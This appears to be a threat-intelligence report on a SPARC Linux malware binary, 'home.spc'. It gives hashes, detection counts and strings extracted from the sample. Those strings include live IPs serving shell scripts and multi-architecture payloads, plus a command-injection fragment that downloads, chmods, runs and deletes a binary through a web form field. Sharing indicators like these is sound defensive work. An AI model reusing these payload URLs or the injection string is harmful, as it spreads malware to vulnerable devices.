home.spc

First submission 2023-09-12 17:57:04

File details

File type: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
Mime type: application/x-executable
File size: 111.06 KB (113728 bytes)
MD5: 84c40da6fde00c7d504db583cf2c29ef
SHA1: 8aa5a50b94bc3a0e5b0a845f79024bf45eef2404
SHA256: 35ebd739eeda6c16805fec900b7b6dea3d9f457006dc2448e9a46bb9b0c871b0
Virus Total: 37/61 VT report date: 2023-09-12 15:31:58

File features detected

Is DLL

Packers

Anti Debug

Anti VM

Signed

XOR

URLs, FQDN and IP indicators 1

URL Host (FQDN/IP) Date Added
hXXp://172.247.38.252/idk/home.spc VirusTotal Report 172.247.38.252 VirusTotal Report 2023-09-12 17:57:04

Strings analysis - Possible IPs found 4

172.247.38.252
172.247.38.19
127.0.0.1
255.255.255.255

Strings analysis - Possible URLs found 9

http://172.247.38.19/c.sh;
http://172.247.38.252/idk/home.mips
http://172.247.38.252/idk/home.x86
http://172.247.38.252/idk/home.arm7;chmod+777+home.arm7;./home.arm7;rm+-rf+home.arm7%3b%23&remoteSubmit=Save
http://172.247.38.252/idk/home.mips;
http://schemas.xmlsoap.org/soap/envelope/
http://172.247.38.19/w.sh;
http://schemas.xmlsoap.org/soap/encoding/
http://172.247.38.19/wget.sh;